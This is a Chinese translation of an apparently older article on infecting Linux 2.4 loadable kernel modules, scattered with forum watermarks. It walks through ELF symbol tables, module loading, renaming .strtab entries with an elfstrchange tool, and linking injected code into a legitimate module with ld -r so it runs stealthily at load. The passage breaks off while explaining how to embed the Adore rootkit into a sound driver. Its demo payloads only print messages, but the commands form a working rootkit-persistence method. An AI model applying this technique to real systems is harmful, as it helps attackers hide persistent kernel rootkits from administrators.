Loadable Kernel Modules 注射

LKM 注射

--[ 内容

1 - 介绍

2 - ELF 基础知识
2.1 - The .symtab section
2.2 - The .strtab section

3 - 玩转 loadable kernel modules
3.1 - 模块加载
3.2 - 修改 .strtab section
3.3 - 插入代码
3.4 - 保持隐蔽性

4 - 实例
4.1 - 最简单的 LKM 感染
4.2 - 我还会回来的 （重启之后）

5 - 关于其他的操作系统
5.1 - Solaris
5.2 - *BSD
5.2.1 - FreeBSD
5.2.2 - NetBSD
5.2.3 - OpenBSD

6 - 结论

7 - 感谢 中国网管论坛bbs.bitsCN.com

8 - 参考资料

9 - 源代码
9.1 - ElfStrChange
9.2 - Lkminject



--[ 1 - 介绍

这些年来，很多 rootkit 使用了 loadable kernel modules。这仅仅是一种短暂的流
行现象吗？不是，lkm 的广泛使用得益于它强大的功能：可以隐藏文件，进程还有其他
一些妙用。对于第一代使用 lkm 的 rootkits，使用lsmod命令就可以轻易的找出它们。
我们见过许许多多隐藏模块的手法，比如在Plaguez的文章 [1]里提到的那种，还有更多
的在Adore Rootkit [2]里面用到的技巧。几年以后，我们还看到一些新技术：通过使用
/dev/kmem [3] 修改kernel内存映射（kernel memory image）。最后，参考资料[4]向
我们展示了静态内核补丁（static kernel patching）技术。这个技术解决了一个大问题：
rootkit在机器重启后可以重新加载。

（译者注：查找了一下lsmod的运作方式，供大家了解。"在kernel 2.0.x 时，指令
'lsmod'是去开启档案 '/proc/modules' 来得知系统中，已加载哪些 Module。不过
到了kernel 2.1.x以后，系统提供了函式' query_module'。因此，此时'lsmod'的实
作便是透过呼叫 query_module 来取得系统已加载 module的相关资料。"） 网管联盟www.bitsCN.com

本文提出了一种新的隐藏lkm rootkits的技术并且保证这些rootkit在机器重启后能够
重新加载。文章会提到如何感染一个系统使用的内核模块。本文针对的是 Linux kernel
x86 2.4.x 系列，不过这个技术可以在任何使用ELF文件格式的系统中推广。要了解这个
技术需要一些基础知识。内核模块是ELF object 文件，我们需要了解一点ELF格式，尤其
是关于符号命名部分的知识。此后，我们会接着学习模块加载机制以便了解如何把恶意代
码插入内核模块中。最后，实战操作一下模块的插入。


--[ 2 - ELF 基础

Executable（可执行） & Linking（链接） Format (ELF) 是用于linux操作系统上的
可执行文件格式。我们先要了解部分相关知识，以后用得着（如果想要全面了解ELF格式，
请参考[1]）。 当链接两个ELF object 文件的时候，链接程序需要知道每个object文件
里相关符号的一些情况。每个ELF object文件（比如lkm的那些object文件）包含了两个
部分（译者注：就是后文的 .symtab 和 .strtab 两个section ）。这两个section 是用
来存储每个符号的信息结构的。我们不但要研究它们，还要总结出一些对感染内核模块有
用的思路。

54ne.com

----[ 2.1 - .symtab section

这部分是一个结构列表。当链接程序使用那些ELF object文件里的符号时，就需要这些
数据。在/usr/include/elf.h里可以找到这个结构的定义：

/* Symbol table entry. */（符号列表入口）

typedef struct
{
Elf32_Word st_name; /* Symbol name (string tbl index) */（符号名（字符串列表索引））
Elf32_Addr st_value; /* Symbol value */（符号的值）
Elf32_Word st_size; /* Symbol size */（符号数据占用空间的大小）
unsigned char st_info; /* Symbol type and binding */（符号类型和绑定）
unsigned char st_other; /* Symbol visibility */（符号的可见性）
Elf32_Section st_shndx; /* Section index */（各section 的索引）
} Elf32_Sym;

这里我们只对st_name感兴趣。实际上它是 .strtab section 的索引，而那些符号的名称就是
存储在 .strtab 里面的。


----[ 2.2 - .strtab section

.strtab section 是一个非空字符串的列表。正如我们上面看见的，Elf32_Sym里面的st_name
是 .strtab section 的索引。如果我们寻找的符号在某个字符串里，我们可以很方便的得到这个

中国网管联盟www、bitsCN、com

字符串的偏移地址。下面是我们的计算公式：

offset_sym_name = offset_strtab + st_name

offset_strtab 是 .strtab section 相对于文件起始处的偏移地址，可以通过section 名称解
析机制获得。这和我们要谈的技术关系不是很大，这里就不深究了。参考资料[5]里面详细探讨了
这个问题，后面章节9.1给出了具体实现的代码。

现在可以说，在ELF object 文件里，我们可以很方便的找到符号名并修改它们。不过修改过程
中始终要牢记一点：.strtab section 是由连续的非空字符串组成的，这对修改后新的符号名是一
个限制：新名称的长度不能超过原来的那个长度，否则会殃及 .strtab 中下一个符号。（译者注：
这里和溢出的道理一样，新名称长度超过原先设定值，多出的部分就会写到后面一个符号名区域里，
覆盖后面有用的部分）

遵守了这一点，我们就能做到简单的修改符号名而不影响模块的正常运行，最终实现用一
个模块感染另一个模块。


--[ 3 - 玩转 loadable kernel modules

下面这段给出了动态加载模块程序的源代码。了解了这个，我们就能学会在模块中插入代
码了。

----[ 3.1 - 模块加载

中国网管联盟www_bitscn_com

内核模块的加载是通过insmod这个用户空间工具实现的。insmod包含在modutils包里[6]。
我们感兴趣的东西是insmod.c文件里的init_module()函数。

static int init_module(const char *m_name, struct obj_file *f,
unsigned long m_size, const char *blob_name,
unsigned int noload, unsigned int flag_load_map)
{
(1) struct module *module;
struct obj_section *sec;
void *image;
int ret = 0;
tgt_long m_addr;

....

(2) module->init = obj_symbol_final_value(f,
obj_find_symbol(f, "init_module"));
(3) module->cleanup = obj_symbol_final_value(f,
obj_find_symbol(f, "cleanup_module"));

....

if (ret == 0 && !noload) {
fflush(stdout); /* Flush any debugging output */
(4) ret = sys_init_module(m_name, (struct module *) image);
if (ret) {
error("init_module: %m");
lprintf(
"Hint: insmod errors can be caused by incorrect module parameters, "
"including invalid IO or IRQ parameters.n"

中国网管联盟www.bitscn.com

"You may find more information in syslog or the output from dmesg");
}
}

在 (1) 里，函数向一个结构体模块（struct module）填充了加载模块必须的数据。
需要关注的部分是 init_module 和 cleanup_module。这是两个函数指针，分别指向
被加载模块的 init_module() 和 cleanup_module() 函数。(2)里面的 obj_find_symbol()
函数遍历符号列表查找名字为init_module的符号，然后提取这个结构体符号（struct
symbol）并把它传递给 obj_symbol_final_value()。后者从这个结构体符号提取出
init_module函数的地址。同理，在 (3) 里这个工作对于cleanup_module()又重复了一
遍。需要牢记的是，对于模块初始化或结束时调用的函数，他们在 .strtab section 的入口
分别对应着 init_module 和 cleanup_module。

当结构体模块填充完毕后，(4) 使用了 sys_init_module() 这个系统调用（syscall）
通知内核加载相应模块。

模块加载过程中程序调用了 sys_init_module()，其中有我们感兴趣的部分。这个函
数的代码可以在 /usr/src/linux/kernel/module.c 里找到：

asmlinkage long
sys_init_module(const char *name_user, struct module *mod_user) 中国网管联盟www、bitsCN、com
{
struct module mod_tmp, *mod;
char *name, *n_name, *name_tmp = NULL;
long namelen, n_namelen, i, error;
unsigned long mod_user_size;
struct module_ref *dep;

/* 很多sanity checks */
.....
/* 好了，上面是我们可以忍受的所有的sanity checks；剩下的拷贝如下。*/

(1) if (copy_from_user((char *)mod+mod_user_size,
(char *)mod_user+mod_user_size,
mod->size-mod_user_size)) {
error = -EFAULT;
goto err3;
}

/* 其他的sanity checks */

....

/* 初始化模块 */
atomic_set(&mod->uc.usecount,1);
mod->flags |= MOD_INITIALIZING;
(2) if (mod->init && (error = mod->init()) != 0) {
atomic_set(&mod->uc.usecount,0);
mod->flags &= ~MOD_INITIALIZING;
if (error > 0) /* Buggy module */
error = -EBUSY;
goto err0;
}
atomic_dec(&mod->uc.usecount);

在一些sanity check之后，结构体模块被 (1) 里的copy_from_user()从用户空间拷贝
到内核空间。然后 (2) 里通过使用 mod->init() 函数指针调用了被加载模块的 54com.cn
init_module() 函数。而 mod->init() 这个指针的值是由 insmod 这个工具填充的。


----[ 3.2 - 修改 .strtab section

前面已经提到了，通过检查 .strtab section 里的字符串，我们可以定位模块中init函数的
地址。而通过修改这个字符串，我们可以在模块被加载的时候执行其他的函数。

修改 .strtab section 入口有几种办法。ld 的 -wrap 参数可以做到。不过这个方法和我们
后面要用到的 -r 参数（章节3.3）不兼容。在章节5.1里，我们会看到如何用xxd完成这
个工作。我写了一个工具（章节9.1）自动执行这些。

下面是一个简单的例子：

$ cat test.c
#define MODULE
#define __KERNEL__

#include <linux/module.h>
#include <linux/kernel.h>

int init_module(void)
{
printk ("<1> Into init_module()n");
return 0;
}

int evil_module(void)
{
printk ("<1> Into evil_module()n");
return 0;
}

int cleanup_module(void)
{
printk ("<1> Into cleanup_module()n");

网管联盟www.bitsCN.com

return 0;
}

$ cc -O2 -c test.c

让我们看看 .symtab 和 .strtab 这两个section:

$ objdump -t test.o

test.o: file format elf32-i386

SYMBOL TABLE:
0000000000000000 l df *ABS* 0000000000000000 test.c
0000000000000000 l d .text 0000000000000000
0000000000000000 l d .data 0000000000000000
0000000000000000 l d .bss 0000000000000000
0000000000000000 l d .modinfo 0000000000000000
0000000000000000 l O .modinfo 0000000000000016 __module_kernel_version
0000000000000000 l d .rodata 0000000000000000
0000000000000000 l d .comment 0000000000000000
0000000000000000 g F .text 0000000000000014 init_module
0000000000000000 *UND* 0000000000000000 printk
0000000000000014 g F .text 0000000000000014 evil_module
0000000000000028 g F .text 0000000000000014 cleanup_module

我们马上要修改 .strtab section 的两个入口以便把 evil_module 的符号名改成 init_module。
首先必须把 init_module 这个符号重命名。在同一个ELF object文件里，两个性质相同的符 54com.cn
号名字不能重复。下面是操作过程：

重命名
1) init_module ----> dumm_module
2) evil_module ----> init_module


$ ./elfstrchange test.o init_module dumm_module
[+] Symbol init_module located at 0x3dc
[+] .strtab entry overwriten with dumm_module

$ ./elfstrchange test.o evil_module init_module
[+] Symbol evil_module located at 0x3ef
[+] .strtab entry overwriten with init_module

$ objdump -t test.o

test.o: file format elf32-i386

SYMBOL TABLE:
0000000000000000 l df *ABS* 0000000000000000 test.c
0000000000000000 l d .text 0000000000000000
0000000000000000 l d .data 0000000000000000
0000000000000000 l d .bss 0000000000000000
0000000000000000 l d .modinfo 0000000000000000
0000000000000000 l O .modinfo 0000000000000016 __module_kernel_version
0000000000000000 l d .rodata 0000000000000000
0000000000000000 l d .comment 0000000000000000
0000000000000000 g F .text 0000000000000014 dumm_module 网管网bitsCN_com
0000000000000000 *UND* 0000000000000000 printk
0000000000000014 g F .text 0000000000000014 init_module
0000000000000028 g F .text 0000000000000014 cleanup_module


# insmod test.o
# tail -n 1 /var/log/kernel
May 4 22:46:55 accelerator kernel: Into evil_module()

正如我们看到的，evil_module() 被当作 init_module() 调用了。


----[ 3.3 - 插入代码

不断发展的技术使得替换函数并且执行变成了可能，不过这还不是特别有趣。如果我们
能在已有的模块中插入外来的代码就更好了。有一种方法可以 *轻松* 做到这点－－使用
ld 这个法宝。

$ cat original.c
#define MODULE
#define __KERNEL__

#include <linux/module.h>
#include <linux/kernel.h>

int init_module(void)
{
printk ("<1> Into init_module()n");
return 0;
}

int cleanup_module(void)
{
printk ("<1> Into cleanup_module()n");
return 0;
}

$ cat inject.c
#define MODULE 网管网bitsCN_com
#define __KERNEL__

#include <linux/module.h>
#include <linux/kernel.h>


int inje_module (void)
{
printk ("<1> Injectedn");
return 0;
}

$ cc -O2 -c original.c
$ cc -O2 -c inject.c


重要部分开始了。由于内核模块都是可以重定位的ELF object文件，代码插入并不是个
问题。这种object文件在链接后可以共享彼此的符号。同样这里有一个原则：要链接在一
起的几个模块里不能有同名符号。使用 ld 命令带上 -r 参数完成一个部分链接，不改变
链接文件的性质。这样声明的模块可以被内核加载。

$ ld -r original.o inject.o -o evil.o
$ mv evil.o original.o
$ objdump -t original.o

original.o: file format elf32-i386

SYMBOL TABLE:
0000000000000000 l d .text 0000000000000000
0000000000000000 l d *ABS* 0000000000000000
0000000000000000 l d .rodata 0000000000000000
0000000000000000 l d .modinfo 0000000000000000
0000000000000000 l d .data 0000000000000000
0000000000000000 l d .bss 0000000000000000 网管网bitsCN_com
0000000000000000 l d .comment 0000000000000000
0000000000000000 l d *ABS* 0000000000000000
0000000000000000 l d *ABS* 0000000000000000
0000000000000000 l d *ABS* 0000000000000000
0000000000000000 l df *ABS* 0000000000000000 original.c
0000000000000000 l O .modinfo 0000000000000016 __module_kernel_version
0000000000000000 l df *ABS* 0000000000000000 inject.c
0000000000000016 l O .modinfo 0000000000000016 __module_kernel_version
0000000000000014 g F .text 0000000000000014 cleanup_module
0000000000000000 g F .text 0000000000000014 init_module
0000000000000000 *UND* 0000000000000000 printk
0000000000000028 g F .text 0000000000000014 inje_module


这样 inje_module() 函数就被链接进了模块。现在我们要修改 .strtab section 以保证模块
加载时被调用的是inje_module()而不是init_module()。


$ ./elfstrchange original.o init_module dumm_module
[+] Symbol init_module located at 0x4a8
[+] .strtab entry overwriten with dumm_module

54com.cn

$ ./elfstrchange original.o inje_module init_module
[+] Symbol inje_module located at 0x4bb
[+] .strtab entry overwriten with init_module


开火吧：

# insmod original.o
# tail -n 1 /var/log/kernel
May 14 20:37:02 accelerator kernel: Injected

奇迹发生了 :)


----[ 3.4 - 保持隐蔽性

大多数时候，我们要感染那些正在使用的的模块。如果我们用别的函数替换
了init_module()，模块原先的功能就不能发挥了。明眼人很容易发现这个被感染
的模块。有一个解决方法可以既保留原有的功能，又能插入我们的代码。.strtab
被 hack 了以后，真正的 init_module()　函数重命名为dumm_module。如果我
们在插入的 evil_module() 函数里调用 dumm_module()，那么真正的 init_module()
就会在模块初始化时执行，从而模块原有的功能也不会被破坏。

替换
init_module ------> dumm_module
inje_module ------> init_module (将会调用 dumm_module)


$ cat stealth.c
#define MODULE
#define __KERNEL__

#include <linux/module.h>

网管网bitsCN.com

#include <linux/kernel.h>


int inje_module (void)
{
dumm_module ();
printk ("<1> Injectedn");
return 0;
}

$ cc -O2 -c stealth.c
$ ld -r original.o stealth.o -o evil.o
$ mv evil.o original.o
$ ./elfstrchange original.o init_module dumm_module
[+] Symbol init_module located at 0x4c9
[+] .strtab entry overwriten with dumm_module

$ ./elfstrchange original.o inje_module init_module
[+] Symbol inje_module located at 0x4e8
[+] .strtab entry overwriten with init_module

# insmod original.o
# tail -n 2 /var/log/kernel
May 17 14:57:31 accelerator kernel: Into init_module()
May 17 14:57:31 accelerator kernel: Injected


好极了，我们插入的代码在正常代码运行之后也得到了执行，这下够隐蔽的了。


--[ 4 - 实例

下面修改 init_module() 的方法对 cleanup_module() 函数也同样适用。这样，我们就
可以把一个完整的模块插入另一个模块中去了。我曾经通过简单的处理把著名的 Adore[2]

网管网bitsCN.com

rootkit 插入到我的声卡驱程（i810_audio.o）里。

----[ 4.1 - 最简单的 LKM 感染

1) 我们必须对adore.c稍稍做点修改

* 在 init_module() 函数里加入对 dumm_module() 的调用
* 在 cleanup_module() 模块函数里加入对 dummcle_module() 的调用
* 把 init_module 函数名改成 evil_module
* 把 cleanup_module 函数名改成 evclean_module
（译者注：注意始终保持函数名长度和原名称的一致性）